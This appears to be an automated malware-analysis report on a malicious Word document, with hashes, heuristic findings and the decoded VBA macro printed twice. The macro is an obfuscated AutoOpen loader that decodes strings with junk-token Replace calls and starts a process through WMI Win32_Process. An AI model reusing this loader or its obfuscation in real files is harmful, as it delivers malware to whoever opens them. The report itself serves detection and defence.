Office (OLE) malware analysis — malicious · b60ba70aa7fd8996

MALICIOUS

Office (OLE)

134.0 KB Created: 2019-09-24 06:41:00 Authoring application: Microsoft Office Word First seen: 2020-04-06

MD5: 51648f6655f1e1a8d4735b96aeeb8669 SHA-1: 27b89fa0a7bb3035a902de248650c44d07a89100 SHA-256: b60ba70aa7fd899677ef9baef06bf0c2098ad3e98233da8b2fd5146830783f36

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing an obfuscated VBA macro. The macro utilizes CreateObject and execution tokens, indicative of a loader designed to download and execute a second-stage payload. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further support its malicious nature.

Heuristics 8

ClamAV: Doc.Malware.Generic-7178224-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9912 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9912 bytes
SHA-256: `789f92747ade950b7c314ec40d8d8c4967fe61c47da3e6275c50d36fb51395db`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Kkmjww" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox" Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox" Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox" Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox" Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox" Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox" Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox" Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox" Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox" Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox" Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox" Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox" Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox" Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox" Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox" Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox" Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox" Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox" Attribute VB_Name = "Shqkwv" Private Const Brjjiv As String = "Xnp6q4q" Private Const Tpvkdl As String = "Itj64o" Private Wvhidrap As String Private J5hw3qk As Boolean Private Pjiv7b As Integer Private Declare Sub Ffqczj Lib "V0rdjf" () Private Declare Sub H61ubr Lib "P44ci1" () Function Nnazwms() Dim pDBXVeleSn95, yALtDyQJVU12 As Integer yALtDyQJVU12 = 8541 For pDBXVeleSn95 = 0 To 88 yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95 DoEvents Next pDBXVeleSn95 Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz) Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer mxBXzQQtbS22 = 8263 For kmJQTFcJOI63 = 0 To 96 mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63 DoEvents Next kmJQTFcJOI63 Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf) Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer wUXYnJzxWl84 = 7624 For UKUBCTGYrd34 = 0 To 76 wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34 DoEvents Next UKUBCTGYrd34 End Function Function Ti1iz0cl(E6pinh) Dim bIEeUYPMQL63, cfibQITmka13 As Integer cfibQITmka13 = 5323 For bIEeUYPMQL63 = 0 To 25 cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63 DoEvents Next bIEeUYPMQL63 Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "") End Function Attribute VB_Name = "S8u1adw" Private Const S3vczf As String = "Z918ur1p" Private Const Qz0su2 As String = "Y60rrn" Private Pzkb0pl As String Private C2ijjt As Boolean Private Ypdfc9tz As Integer Private Declare Sub Gpzhdb Lib "J61dhb" () Private Declare Sub R1uiqcwt Lib "Y72pqba" () Sub autoopen() Dim SQZiGxarup86, NxIwNiZDoj34 As Integer NxIwNiZDoj34 = 6788 For SQZiGxarup86 = 0 To 17 NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86 DoEvents Next SQZiGxarup86 Nnazwms End Sub Function Yh3wpj() Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer OnSlpvPgmm82 = 4395 For TYWXvZKgog25 = 0 To 36 OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25 DoEvents Next TYWXvZKgog25 Z7bap4$ = N7oo7a3p + Y83nojt Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer TyvIxAOXdA51 = 9313 For YIqBrnoQql13 = 0 To 65 TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13 DoEvents Next YIqBrnoQql13 Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw)) Yh3wpj.ShowWindow! = Z7bap4 Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer wUXYnJzxWl84 = 7624 For UKUBCTGYrd34 = 0 To 76 wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34 DoEvents Next UKUBCTGYrd34 End Function ' Processing file: /opt/analyzer/scan_staging/f3d1d3695d394818bb6ff7a4491cfae7.bin ' =============================================================================== ' Module streams: ' Macros/VBA/Kkmjww - 3295 bytes ' Macros/VBA/Shqkwv - 3266 bytes ... (truncated)

SHA-256: 789f92747ade950b7c314ec40d8d8c4967fe61c47da3e6275c50d36fb51395db

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/f3d1d3695d394818bb6ff7a4491cfae7.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.